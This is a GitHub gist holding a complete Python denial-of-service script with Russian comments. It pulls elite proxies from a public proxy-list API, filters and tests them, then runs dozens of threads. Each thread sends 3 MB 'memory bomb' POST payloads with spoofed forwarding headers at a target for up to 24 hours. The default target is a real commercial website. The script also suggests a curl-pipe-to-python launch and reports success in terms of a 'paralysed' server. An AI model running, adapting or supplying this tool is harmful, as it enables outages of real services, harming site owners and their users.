Skip to content

Instantly share code, notes, and snippets.

@RoninReilly
Last active July 25, 2025 10:03
Show Gist options
  • Select an option

  • Save RoninReilly/805c5a371378d273d0883c26def6b04d to your computer and use it in GitHub Desktop.

Select an option

Save RoninReilly/805c5a371378d273d0883c26def6b04d to your computer and use it in GitHub Desktop.
🔥 DoS Attack with Geonode API - Quality Proxies
#!/usr/bin/env python3
"""
🔥 DoS АТАКА С GEONODE API - ПРОВЕРЕННЫЕ ПРОКСИ 🔥
Версия с качественными прокси от Geonode API
Использование:
python3 simple_dos_server_geonode.py
python3 simple_dos_server_geonode.py --target https://example.com --threads 50 --duration 3600
curl -s https://your-server.com/simple_dos_server_geonode.py | python3
"""
import requests
import threading
import time
import random
import os
import sys
import argparse
from datetime import datetime
from collections import deque
import json
# Автоматическая установка зависимостей
def install_requirements():
"""Автоматически устанавливает необходимые зависимости"""
try:
import requests
except ImportError:
print("📦 Устанавливаю requests...")
os.system(f"{sys.executable} -m pip install requests")
import requests
# --- КОНФИГУРАЦИЯ ПО УМОЛЧАНИЮ ---
DEFAULT_CONFIG = {
'target_url': "https://bertazzoni.com.ru/bertazzoni/?limit=1000",
'thread_count': 50,
'attack_duration': 86400, # 24 часа
'log_interval': 5,
'geonode_api_url': "https://proxylist.geonode.com/api/proxy-list",
'geonode_params': {
'limit': 500,
'page': 1,
'sort_by': 'lastChecked',
'sort_type': 'desc',
'speed': 'fast', # Только быстрые прокси
'anonymityLevel': 'elite', # Только элитные
'protocols': 'http,socks4,socks5'
},
'max_pages': 10, # Максимум страниц для загрузки
'required_working_proxies': 100,
'memory_bomb_size': 3000000, # 3MB
'request_timeout': 10,
'proxy_test_timeout': 6,
'max_test_workers': 30,
'min_uptime': 90, # Минимальный uptime в %
'max_latency': 500 # Максимальная задержка в мс
}
# Глобальные переменные
all_proxies = []
working_proxies = []
proxy_info = {} # Информация о прокси из API
current_proxy_index = 0
stats = {
'total': 0,
'success': 0,
'failed': 0,
'times': deque(maxlen=100),
'proxy_success': {},
'proxy_failed': {},
'server_status': 'Unknown',
'start_time': None,
'last_response_time': 0,
'requests_per_second': 0,
'avg_response_time': 0,
'attack_running': False
}
lock = threading.Lock()
def log(message, level="INFO"):
"""Простое логирование"""
timestamp = datetime.now().strftime("%H:%M:%S")
print(f"[{timestamp}] [{level}] {message}")
def fetch_geonode_proxies():
"""Загружает прокси из Geonode API"""
log("🌐 Загружаю качественные прокси из Geonode API...")
all_fetched = []
for page in range(1, DEFAULT_CONFIG['max_pages'] + 1):
try:
params = DEFAULT_CONFIG['geonode_params'].copy()
params['page'] = page
log(f"📥 Загружаю страницу {page}...")
response = requests.get(DEFAULT_CONFIG['geonode_api_url'], params=params, timeout=10)
if response.status_code == 200:
data = response.json()
proxies_data = data.get('data', [])
if not proxies_data:
log(f"📄 Страница {page} пустая, останавливаю загрузку")
break
page_count = 0
for proxy_data in proxies_data:
# Фильтруем по качеству
uptime = proxy_data.get('upTime', 0)
latency = proxy_data.get('latency', 999)
if uptime >= DEFAULT_CONFIG['min_uptime'] and latency <= DEFAULT_CONFIG['max_latency']:
ip = proxy_data.get('ip')
port = proxy_data.get('port')
protocols = proxy_data.get('protocols', ['http'])
if ip and port:
proxy_url = f"{ip}:{port}"
all_fetched.append(proxy_url)
# Сохраняем информацию о прокси
proxy_info[proxy_url] = {
'protocols': protocols,
'uptime': uptime,
'latency': latency,
'country': proxy_data.get('country', 'Unknown'),
'city': proxy_data.get('city', 'Unknown'),
'anonymity': proxy_data.get('anonymityLevel', 'unknown'),
'speed': proxy_data.get('speed', 1)
}
page_count += 1
log(f"✅ Страница {page}: получено {page_count} качественных прокси")
else:
log(f"❌ Ошибка загрузки страницы {page}: {response.status_code}")
except Exception as e:
log(f"❌ Ошибка загрузки страницы {page}: {e}", "ERROR")
log(f"🎯 Всего загружено {len(all_fetched)} качественных прокси из Geonode")
return all_fetched
def get_best_protocol(proxy_url):
"""Возвращает лучший протокол для прокси"""
protocols = proxy_info.get(proxy_url, {}).get('protocols', ['http'])
# Приоритет: socks5 > socks4 > http
if 'socks5' in protocols:
return 'socks5'
elif 'socks4' in protocols:
return 'socks4'
else:
return 'http'
def format_proxy(proxy_url, protocol='http'):
"""Форматирует прокси для requests"""
if protocol == 'socks4':
if not proxy_url.startswith('socks4://'):
proxy_url = 'socks4://' + proxy_url
elif protocol == 'socks5':
if not proxy_url.startswith('socks5://'):
proxy_url = 'socks5://' + proxy_url
else: # http
if not proxy_url.startswith(('http://', 'https://')):
proxy_url = 'http://' + proxy_url
return {
'http': proxy_url,
'https': proxy_url
}
def test_single_proxy(proxy_url, test_url="http://google.com"):
"""Тестирует один прокси с разными методами"""
protocols_to_try = ['http'] # Только HTTP для простоты
for protocol in protocols_to_try:
try:
proxy_dict = format_proxy(proxy_url, protocol)
start_time = time.time()
response = requests.get(
test_url,
proxies=proxy_dict,
timeout=DEFAULT_CONFIG['proxy_test_timeout'],
headers={
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
},
allow_redirects=True,
verify=False
)
response_time = time.time() - start_time
if response.status_code in [200, 301, 302] and response_time < 15:
return True, response_time, protocol
except:
continue
return False, 0, None
def find_working_proxies():
"""Ищет рабочие прокси из загруженных"""
global working_proxies
# Сначала загружаем прокси из API
all_proxies = fetch_geonode_proxies()
if not all_proxies:
log("❌ Не удалось загрузить прокси из Geonode API", "ERROR")
return False
log(f"🔍 Тестирую {len(all_proxies)} прокси из Geonode...")
working_proxies = []
tested_count = 0
# Сортируем по uptime и скорости (лучшие первыми)
sorted_proxies = sorted(all_proxies, key=lambda p: (
-proxy_info.get(p, {}).get('uptime', 0),
proxy_info.get(p, {}).get('latency', 999),
-proxy_info.get(p, {}).get('speed', 1)
))
# Тестируем пачками
batch_size = DEFAULT_CONFIG['max_test_workers']
for i in range(0, len(sorted_proxies), batch_size):
if len(working_proxies) >= DEFAULT_CONFIG['required_working_proxies']:
break
batch = sorted_proxies[i:i + batch_size]
import concurrent.futures
with concurrent.futures.ThreadPoolExecutor(max_workers=DEFAULT_CONFIG['max_test_workers']) as executor:
future_to_proxy = {executor.submit(test_single_proxy, proxy): proxy for proxy in batch}
for future in concurrent.futures.as_completed(future_to_proxy):
proxy = future_to_proxy[future]
tested_count += 1
try:
is_working, response_time, protocol = future.result()
if is_working:
working_proxies.append(proxy)
proxy_info[proxy]['test_time'] = response_time
proxy_info[proxy]['best_protocol'] = protocol
info = proxy_info[proxy]
log(f"✅ Рабочий прокси #{len(working_proxies)}: {proxy} "
f"({protocol}, {response_time:.2f}s, {info['uptime']:.1f}% uptime, {info['country']})")
if len(working_proxies) >= DEFAULT_CONFIG['required_working_proxies']:
break
except Exception as e:
pass
log(f"📊 Протестировано: {tested_count}, Найдено рабочих: {len(working_proxies)}")
if len(working_proxies) >= DEFAULT_CONFIG['required_working_proxies']:
break
log(f"🎯 Найдено {len(working_proxies)} рабочих прокси из {tested_count} протестированных")
if len(working_proxies) < 10:
log("❌ Слишком мало рабочих прокси для эффективной атаки", "ERROR")
return False
# Сортируем рабочие прокси по скорости тестирования
working_proxies.sort(key=lambda p: proxy_info.get(p, {}).get('test_time', 999))
best_proxy = working_proxies[0]
best_info = proxy_info[best_proxy]
log(f"🚀 Самый быстрый прокси: {best_proxy} "
f"({best_info['test_time']:.2f}s, {best_info['uptime']:.1f}% uptime)")
return True
def get_next_working_proxy():
"""Возвращает следующий рабочий прокси по ротации"""
global current_proxy_index
if not working_proxies:
return None
with lock:
current_proxy_index = (current_proxy_index + 1) % len(working_proxies)
return working_proxies[current_proxy_index]
def aggressive_attack(target_url):
"""Агрессивная атака через качественные прокси"""
proxy_url = get_next_working_proxy()
if not proxy_url:
return False
try:
protocol = proxy_info.get(proxy_url, {}).get('best_protocol', 'http')
proxy_dict = format_proxy(proxy_url, protocol)
# Агрессивные данные
attack_data = {
'memory_payload': 'X' * DEFAULT_CONFIG['memory_bomb_size'],
'attack_type': 'geonode_attack',
'attack_id': str(random.randint(100000, 999999)),
'timestamp': str(time.time())
}
# Добавляем много параметров
for i in range(100):
attack_data[f'param_{i}'] = f'value_{i}_{random.randint(1000,9999)}'
headers = {
'Content-Type': 'application/x-www-form-urlencoded',
'User-Agent': f'Mozilla/5.0 (Geonode-Attack-{random.randint(1000,9999)})',
'Connection': 'close',
'Accept': '*/*',
'Accept-Language': 'en-US,en;q=0.9',
'Accept-Encoding': 'gzip, deflate',
'Cache-Control': 'no-cache',
'X-Forwarded-For': f'{random.randint(1,255)}.{random.randint(1,255)}.{random.randint(1,255)}.{random.randint(1,255)}',
'X-Real-IP': f'{random.randint(1,255)}.{random.randint(1,255)}.{random.randint(1,255)}.{random.randint(1,255)}',
'X-Originating-IP': f'{random.randint(1,255)}.{random.randint(1,255)}.{random.randint(1,255)}.{random.randint(1,255)}'
}
start_time = time.time()
response = requests.post(
target_url,
data=attack_data,
headers=headers,
proxies=proxy_dict,
timeout=DEFAULT_CONFIG['request_timeout'],
allow_redirects=False,
verify=False
)
response_time = time.time() - start_time
with lock:
stats['success'] += 1
stats['total'] += 1
stats['times'].append(response_time)
stats['last_response_time'] = response_time
if proxy_url not in stats['proxy_success']:
stats['proxy_success'][proxy_url] = 0
stats['proxy_success'][proxy_url] += 1
# Определяем статус сервера
if response_time > 15:
stats['server_status'] = 'КРИТИЧЕСКИ ПЕРЕГРУЖЕН'
elif response_time > 10:
stats['server_status'] = 'СИЛЬНО ПЕРЕГРУЖЕН'
elif response_time > 5:
stats['server_status'] = 'ПЕРЕГРУЖЕН'
elif response_time > 2:
stats['server_status'] = 'ПОД НАГРУЗКОЙ'
else:
stats['server_status'] = 'СТАБИЛЬНЫЙ'
return True
except Exception as e:
with lock:
stats['failed'] += 1
stats['total'] += 1
if proxy_url not in stats['proxy_failed']:
stats['proxy_failed'][proxy_url] = 0
stats['proxy_failed'][proxy_url] += 1
return False
def attack_worker(target_url, duration):
"""Рабочий поток атаки"""
start_time = time.time()
while stats['attack_running'] and (time.time() - start_time) < duration:
if not working_proxies:
log("❌ Нет рабочих прокси, останавливаю поток", "ERROR")
break
aggressive_attack(target_url)
# Минимальная задержка для агрессивности
time.sleep(random.uniform(0.005, 0.02))
def calculate_rps():
"""Вычисляет запросы в секунду"""
if not stats['start_time']:
return 0
elapsed = time.time() - stats['start_time']
if elapsed > 0:
return stats['total'] / elapsed
return 0
def get_avg_response_time():
"""Вычисляет среднее время ответа"""
if stats['times']:
return sum(stats['times']) / len(stats['times'])
return 0
def print_stats():
"""Выводит статистику в консоль"""
if stats['total'] == 0:
return
success_rate = (stats['success'] / stats['total']) * 100
rps = calculate_rps()
avg_time = get_avg_response_time()
elapsed = time.time() - stats['start_time'] if stats['start_time'] else 0
log("=" * 80)
log(f"📊 СТАТИСТИКА АТАКИ")
log(f"🎯 Цель: {DEFAULT_CONFIG['target_url']}")
log(f"⏰ Время работы: {elapsed:.0f}с")
log(f"📈 Всего запросов: {stats['total']:,}")
log(f"✅ Успешных: {stats['success']:,} ({success_rate:.1f}%)")
log(f"❌ Неудачных: {stats['failed']:,}")
log(f"🚀 Скорость: {rps:.1f} req/sec")
log(f"⏱️ Среднее время ответа: {avg_time:.3f}с")
log(f"🌐 Рабочих прокси: {len(working_proxies):,}")
log(f"🔥 Статус сервера: {stats['server_status']}")
log("=" * 80)
def stats_monitor(log_interval):
"""Мониторинг статистики в отдельном потоке"""
while stats['attack_running']:
time.sleep(log_interval)
if stats['attack_running']:
print_stats()
def parse_arguments():
"""Парсит аргументы командной строки"""
parser = argparse.ArgumentParser(description='🔥 DoS атака с Geonode API прокси')
parser.add_argument('--target', '-t', default=DEFAULT_CONFIG['target_url'],
help='URL цели для атаки')
parser.add_argument('--threads', '-th', type=int, default=DEFAULT_CONFIG['thread_count'],
help='Количество потоков')
parser.add_argument('--duration', '-d', type=int, default=DEFAULT_CONFIG['attack_duration'],
help='Длительность атаки в секундах')
parser.add_argument('--required-proxies', '-rp', type=int, default=DEFAULT_CONFIG['required_working_proxies'],
help='Минимум рабочих прокси для начала атаки')
parser.add_argument('--log-interval', '-l', type=int, default=DEFAULT_CONFIG['log_interval'],
help='Интервал вывода статистики в секундах')
parser.add_argument('--silent', '-s', action='store_true',
help='Тихий режим (минимум логов)')
return parser.parse_args()
def main():
"""Основная функция"""
global stats
# Устанавливаем зависимости
install_requirements()
# Парсим аргументы
args = parse_arguments()
# Обновляем конфигурацию
DEFAULT_CONFIG['target_url'] = args.target
DEFAULT_CONFIG['thread_count'] = args.threads
DEFAULT_CONFIG['attack_duration'] = args.duration
DEFAULT_CONFIG['log_interval'] = args.log_interval
DEFAULT_CONFIG['required_working_proxies'] = args.required_proxies
if not args.silent:
log("🔥🔥🔥 ЗАПУСК DoS АТАКИ С GEONODE API 🔥🔥🔥")
log(f"🎯 Цель: {DEFAULT_CONFIG['target_url']}")
log(f"🧵 Потоков: {DEFAULT_CONFIG['thread_count']}")
log(f"⏰ Длительность: {DEFAULT_CONFIG['attack_duration']} секунд")
log(f"🎯 Требуется рабочих прокси: {DEFAULT_CONFIG['required_working_proxies']}")
log("🚀 Источник: Geonode API (качественные прокси)")
# Ищем рабочие прокси
if not find_working_proxies():
log("❌ Не удалось найти достаточно рабочих прокси. Завершение работы.", "ERROR")
return 1
if not args.silent:
log(f"🎯 Найдено {len(working_proxies):,} рабочих прокси")
log("🚀 Начинаю агрессивную атаку...")
stats['start_time'] = time.time()
stats['attack_running'] = True
# Запускаем атакующие потоки
threads = []
for i in range(DEFAULT_CONFIG['thread_count']):
thread = threading.Thread(
target=attack_worker,
args=(DEFAULT_CONFIG['target_url'], DEFAULT_CONFIG['attack_duration'])
)
thread.daemon = True
threads.append(thread)
thread.start()
# Запускаем мониторинг статистики
if not args.silent:
stats_thread = threading.Thread(
target=stats_monitor,
args=(DEFAULT_CONFIG['log_interval'],)
)
stats_thread.daemon = True
stats_thread.start()
# Ждем завершения атаки
try:
start_time = time.time()
while stats['attack_running'] and (time.time() - start_time) < DEFAULT_CONFIG['attack_duration']:
time.sleep(1)
stats['attack_running'] = False
if not args.silent:
log("🔥 АТАКА ЗАВЕРШЕНА 🔥")
print_stats()
# Финальная оценка
avg_time = get_avg_response_time()
if avg_time > 15.0:
log("🔥🔥🔥🔥 СЕРВЕР ПОЛНОСТЬЮ ПАРАЛИЗОВАН! 🔥🔥🔥🔥")
elif avg_time > 10.0:
log("🔥🔥🔥 СЕРВЕР КРИТИЧЕСКИ ПЕРЕГРУЖЕН! 🔥🔥🔥")
elif avg_time > 5.0:
log("🔥🔥 СЕРВЕР СИЛЬНО ЗАМЕДЛИЛСЯ! 🔥🔥")
elif avg_time > 2.0:
log("🔥 Сервер под серьезной нагрузкой! 🔥")
else:
log("⚠️ Сервер устоял против атаки")
return 0
except KeyboardInterrupt:
stats['attack_running'] = False
if not args.silent:
log("🛑 АТАКА ОСТАНОВЛЕНА ПОЛЬЗОВАТЕЛЕМ")
return 0
if __name__ == "__main__":
sys.exit(main())
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment